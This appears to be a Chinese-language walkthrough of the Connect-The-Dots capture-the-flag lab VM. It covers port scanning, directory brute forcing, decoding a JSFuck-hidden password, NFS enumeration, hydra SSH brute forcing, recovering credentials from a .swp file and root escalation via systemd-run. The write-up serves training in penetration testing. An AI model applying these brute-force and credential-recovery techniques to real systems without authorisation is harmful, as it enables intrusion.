Connect-The-Dots

Connect-The-Dots_2

一、主機發現和端口掃描

主機發現，靶機地址192.168.80.148
```
arp-scan -l
```

端口掃描

nmap -A -p- -sV 192.168.80.148開放端口
21/tcp    open  ftp      vsftpd 2.0.8 or later
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
111/tcp   open  rpcbind  2-4 (RPC #100000)
2049/tcp  open  nfs      3-4 (RPC #100003)
7822/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
33741/tcp open  nlockmgr 1-4 (RPC #100021)
39565/tcp open  mountd   1-3 (RPC #100005)
56517/tcp open  mountd   1-3 (RPC #100005)
58767/tcp open  mountd   1-3 (RPC #100005)

在這里插入圖片描述

二、信息收集

訪問80端口

Happy Birthday brother!You know how our family have named us, right? Them naming me M and you N. Well, our names are entirely the same except the initials. Life is too short to save names in your memory when you're old, so why not! But do you know who did that? Our mother who was fond of the James Bond movies. She named me after her as M. Perhaps, she thinks that the director of the movie was too lazy to think of one. I mean, who cares, right? Haha, I know you don't like me neither my pesky jokes. But I love you brother. So, don't visit this website until I am done. You'll find nothing but backups, lol.Btw, I know you love challenges so I have something in store for you as well.翻譯
生日快樂，兄弟!你知道我們家是怎么給我們取名的吧?他們叫我M，叫你n。嗯，我們的名字除了首字母外完全一樣。生命太短暫了，當你老了的時候，為什么不把名字保存在你的記憶里呢?但你知道是誰干的嗎?我們的母親非常喜歡詹姆斯·邦德的電影。她以她的名字給我取名叫m。也許，她認為電影的導演太懶了，想不出一個名字。我是說，誰在乎呢?哈哈，我知道你不喜歡我，也不喜歡我那些討厭的笑話。但是我愛你，兄弟。所以，在我完成之前不要訪問這個網站。除了備份你什么都找不到，哈哈。順便說一句，我知道你喜歡挑戰，所以我也為你準備了一些東西。

在這里插入圖片描述

路徑掃描

gobuster dir -u http://192.168.80.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50路徑
/images               (Status: 301) [Size: 317] [--> http://192.168.80.148/images/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.80.148/manual/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.80.148/javascript/]
/backups              (Status: 200) [Size: 6301]
/mysite               (Status: 301) [Size: 317] [--> http://192.168.80.148/mysite/]

在這里插入圖片描述

訪問/backups，就一個3s視頻
訪問/mysite，發現bootstrap.min.cs文件存在加密的東西

使用腳本將文件的字符串搞下來

#coding=utf-8
import requests
import rereq = requests.get("http://192.168.80.148/mysite/bootstrap.min.cs").text
data = re.findall('\s=\s\"(.*?)\"',req)print("".join(data))

進行JSfuck解碼

http://www.liminba.com/tool/jsfuckdecode/alert("You're smart enough to understand me. Here's your secret, TryToGuessThisNorris@2k19")TryToGuessThisNorris@2k19可能是密碼

在這里插入圖片描述

三、NFS滲透

因為開放了2049端口，獲取 nfs 服務器的目錄列列表
```
showmount -e 192.168.80.148得到用戶名 morris
```

嘗試掛載共享目錄，沒成功

mount -t nfs 192.168.80.148:/home/morris dots

在這里插入圖片描述

四、爆破SSH

得到一個用戶名為morris，根據主頁的提示，應該還一個用戶名norris，嘗試ssh爆破

用戶名：
morris
norris
Morris
Norris密碼：
TryToGuessThisNorris@2k19hydra -L /tmp/user -p TryToGuessThisNorris@2k19 192.168.80.148 ssh -s 7822 -vV

在這里插入圖片描述

登錄ssh
```
ssh norris@192.168.80.148 -p 7822
```

五、二次信息收集

登錄ftp下載文件
```
ftp 192.168.80.148
```

查看圖片信息，發現摩斯密碼

exiftool game.jpg.bak.... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-

在這里插入圖片描述

解碼

HEY NORRIS, YOU'VE MADE THIS FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE.諾里斯，你已經走了這么遠了。遠離天堂，現在想看看地獄嗎?哈哈，你肯定想我了，是嗎?哦，該死的，我的電池快沒電了，我找不到充電器這么快，在系統自動關閉之前在這里留下一個提示。我將地下城的入口保存在一個公開訪問的“秘密文件”中。

在這里插入圖片描述

尋找morris密碼，在/var/www/html目錄下發現一個secretfile 文件

I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.我看你是來要密碼的。神圣的魔草!電池快沒電了!!以下提及供參考。

在這里插入圖片描述

查看所有文件，發現.secretfile.swp文件，swp 是編輯器突然斷電或者 ctrl+z 產生的文件
將文件下載下來，發現密碼blehguessme090

登錄ssh

morris：blehguessme090ssh morris@192.168.80.148 -p 7822

在這里插入圖片描述

六、權限提升

systemd-run提權

systemd-run -t /bin/bash輸入TryToGuessThisNorris@2k19

在這里插入圖片描述

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/160779.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/160779.shtml
英文地址，請注明出處：http://en.pswp.cn/news/160779.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！